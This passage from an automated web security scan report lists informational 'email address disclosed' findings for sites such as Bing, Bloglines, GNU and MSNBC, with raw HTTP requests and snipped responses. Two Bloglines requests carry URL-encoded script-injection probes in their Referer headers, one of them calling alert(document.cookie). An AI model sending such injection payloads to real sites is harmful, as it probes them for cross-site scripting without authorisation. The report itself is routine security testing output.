<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
<A HREF="nicolas@framework2.com.ar" REL="nofollow">
...[SNIP]...

26.78. http://www.bing.com/s/osd3.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /s/osd3.xml

Issue detail

The following email address was disclosed in the response:

Request

GET /s/osd3.xml HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 29 May 2009 19:00:47 GMT
ETag: 76EA0033E4279EAF87C4514EAD7F4163000002E2
Cache-Control: public, max-age=2993376
Content-Length: 738
Date: Sat, 29 Jan 2011 23:53:31 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>Bing</ShortName>
<Tags>Bing</Tags>
<Description>Bing. Search b
...[SNIP]...
<Contact>msosa@microsoft.com</Contact>
...[SNIP]...

26.79. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The following email address was disclosed in the response:

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2393165244.2413314893.404292352; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 30 Jan 2011 01:52:17 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31057
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld04 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:rik.robinson@platform-a.com?subject=Advertising%20With%20Black%20Voices">
...[SNIP]...

26.80. http://www.bloglines.com/contact/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bloglines.com
Path:   /contact/

Issue detail

The following email address was disclosed in the response:

Request

GET /contact/ HTTP/1.1
Host: www.bloglines.com
Proxy-Connection: keep-alive
Referer: http://www.bloglines.com/sub/?fc6fa%3Cscript%3Ealert(1)%3C/script%3E715c72a1043=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
ETag: "1645232186"
Last-Modified: Thu, 16 Dec 2010 18:16:39 GMT
Content-Length: 9098
Date: Sun, 30 Jan 2011 17:21:22 GMT
Server: lighttpd/1.4.26

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>


<title>Bloglines | Contact Us</title>
<meta http-equiv="Content
...[SNIP]...
<a href="mailto:bloglines@merchantcircle.com">bloglines@merchantcircle.com</a>
...[SNIP]...

26.81. http://www.bloglines.com/js/r200702160/bl/home.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bloglines.com
Path:   /js/r200702160/bl/home.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/r200702160/bl/home.js HTTP/1.1
Host: www.bloglines.com
Proxy-Connection: keep-alive
Referer: http://www.bloglines.com/sub/?fc6fa%3Cscript%3Ealert(document.cookie)%3C/script%3E715c72a1043=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Accept-Ranges: bytes
ETag: "1465341435"
Last-Modified: Wed, 01 Dec 2010 01:13:52 GMT
Content-Length: 5128
Date: Sun, 30 Jan 2011 01:53:12 GMT
Server: lighttpd/1.4.26

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Bl
...[SNIP]...
<a href="mailto:bloglines@merchantcircle.com">bloglines@merchantcircle.com</a>
...[SNIP]...

26.82. http://www.collectspace.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collectspace.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.collectspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 03:05:28 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-caklakng=BB42101B5313E42DA76A9065185BD7FC; path=/
Last-Modified: Sat, 29 Jan 2011 15:33:04 GMT
Content-Length: 35661

<HTML>
<HEAD>
<META NAME="description" CONTENT="Source for space history, space artifacts, and space memorabilia. Learn where astronauts will appear, browse collecting guides, and read original space
...[SNIP]...
<a href="mailto:subscribe@collectspace.com">subscribe@collectspace.com</a>
...[SNIP]...
<a href="mailto:contact@collectspace.com"><FONT COLOR="#999999" FACE="sans-serif" SIZE="-2">contact@collectspace.com</FONT>
...[SNIP]...

26.83. http://www.dailygrail.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailygrail.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.dailygrail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: SESS2c2d3112bb07aea5c6314767c88e0a7a=7o9nkha47fuqrullf1i58nh6t2; expires=Tue, 22-Feb-2011 06:38:51 GMT; path=/; domain=.dailygrail.com
Last-Modified: Sun, 30 Jan 2011 02:11:26 GMT
ETag: "bf0c65ff60c7c1de71eb6cacfe0d3728"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:32 GMT
Server: lighttpd
Content-Length: 63252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr">
<head>
<meta http-eq
...[SNIP]...
<input type="hidden" name="business" value="userhelp@dailygrail.com" />
...[SNIP]...

26.84. http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.delish.com
Path:   /food/recalls-reviews/its-not-bakery-its-digiorno

Issue detail

The following email address was disclosed in the response:

Request

GET /food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001 HTTP/1.1
Host: www.delish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 93291
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=504
Date: Sat, 29 Jan 2011 23:53:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:katie.delish@gmail.com">
...[SNIP]...

26.85. http://www.everyblock.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everyblock.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.everyblock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 30 Jan 2011 03:05:36 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13518
Last-Modified: Thu, 30 Dec 2010 18:49:16 GMT
Connection: close
Vary: Accept-Encoding
Expires: Sun, 30 Jan 2011 04:05:36 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>EveryBlock ... A news feed for your block</title>
<meta http-equiv="Content-Ty
...[SNIP]...
rror: function(XMLHttpRequest, textStatus, errorThrown) {
$j('#feedbackstatus').html("Whoops! We're experiencing some technical hiccups. If you're not too frustrated by this, please e-mail us at feedback@everyblock.com instead.");
$j('#cr-form').slideToggle();
},
success: function(data, textStatus) {
$j('#feedbackstatus').html("Success! Thanks for taking the time to suggest your city. We'
...[SNIP]...

26.86. http://www.gnu.org/licenses/gpl.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnu.org
Path:   /licenses/gpl.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:23:53 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Sat, 29 Jan 2011 23:23:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...
<!-- advise web-translators@gnu.org and add it to -->
...[SNIP]...

26.87. http://www.hobbyspace.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hobbyspace.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.hobbyspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:06:12 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 59667

<html><!-- #BeginTemplate "/Templates/HomePage.dwt" -->
<head>
<!-- #BeginEditable "doctitle" -->
<title>HobbySpace - Home</title>


<!-- #EndEditable -->
<meta http-equiv="Content-Type" content="text
...[SNIP]...
<input type="hidden" name="business" value="clarklindsey@hobbyspace.com">
...[SNIP]...

26.88. http://www.msnbc.redacted/id/3032118/ns/technology_and_science

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3032118/ns/technology_and_science

Issue detail

The following email address was disclosed in the response:

Request

GET /id/3032118/ns/technology_and_science HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:53:43 GMT
Date: Sat, 29 Jan 2011 23:53:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 176958

<html><head><title>Technology &amp; Science Breaking News Leader - MSNBC - Get the Latest Computer, Space, Gadgets, and Tech Innovation Headlines from Across the World- msnbc.com</title><link rel="sty
...[SNIP]...
</span>pnaskrecki@oeb.harvard.edu</cite>
...[SNIP]...

26.89. http://www.msnbc.redacted/id/32359544/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/32359544/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /id/32359544/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sun, 30 Jan 2011 03:10:08 GMT
Date: Sun, 30 Jan 2011 03:10:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 139906

<html><head><title>About Us: Contact Us| msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/css" href="/default.ashx/id/21589549" /><lin
...[SNIP]...
<a href="mailto:mediainquiries@msnbc.com">
...[SNIP]...
<a href="mailto:nbcnews@msnbc.com">
...[SNIP]...
<a href="mailto:msnbctv@msnbc.com">
...[SNIP]...

26.90. http://www.msnbc.redacted/id/3303511/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3303511/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/3303511/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:10:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 42854


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.91. http://www.msnbc.redacted/id/3303540/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3303540/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /id/3303540/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:10:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 58189


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...
<br />Email Address of Designated Agent: dmcaagnt@microsoft.com</p>
...[SNIP]...

26.92. http://www.msnbc.redacted/id/37643077

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/37643077

Issue detail

The following email address was disclosed in the response:

Request

GET /id/37643077 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 111208


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...

26.93. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41164445/ns/world_news-africa/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41164445/ns/world_news-africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 60561


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.94. http://www.msnbc.redacted/id/41253088/ns/technology_and_science-science

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41253088/ns/technology_and_science-science

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41253088/ns/technology_and_science-science?GT1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:55:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 63050


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.95. http://www.msnbc.redacted/id/41311073/ns/business-consumer_news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41311073/ns/business-consumer_news/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41311073/ns/business-consumer_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:55:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 64384


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.96. http://www.msnbc.redacted/id/41316837/ns/world_news-mideastn_africa/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41316837/ns/world_news-mideastn_africa/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41316837/ns/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 84440


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.97. http://www.msnbc.redacted/id/41317259/ns/politics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41317259/ns/politics

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41317259/ns/politics HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 89571


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.98. http://www.msnbc.redacted/id/41317259/ns/politics/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41317259/ns/politics/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41317259/ns/politics/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:54:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 89250


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.99. http://www.msnbc.redacted/id/41320309/ns/technology_and_science-tech_and_gadgets

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41320309/ns/technology_and_science-tech_and_gadgets

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41320309/ns/technology_and_science-tech_and_gadgets HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:55:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 74988


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.100. http://www.msnbc.redacted/id/41321565/ns/business/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41321565/ns/business/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41321565/ns/business/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 57442


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.101. http://www.msnbc.redacted/id/41322367/ns/local_news-dallasfort_worth_tx/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41322367/ns/local_news-dallasfort_worth_tx/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41322367/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
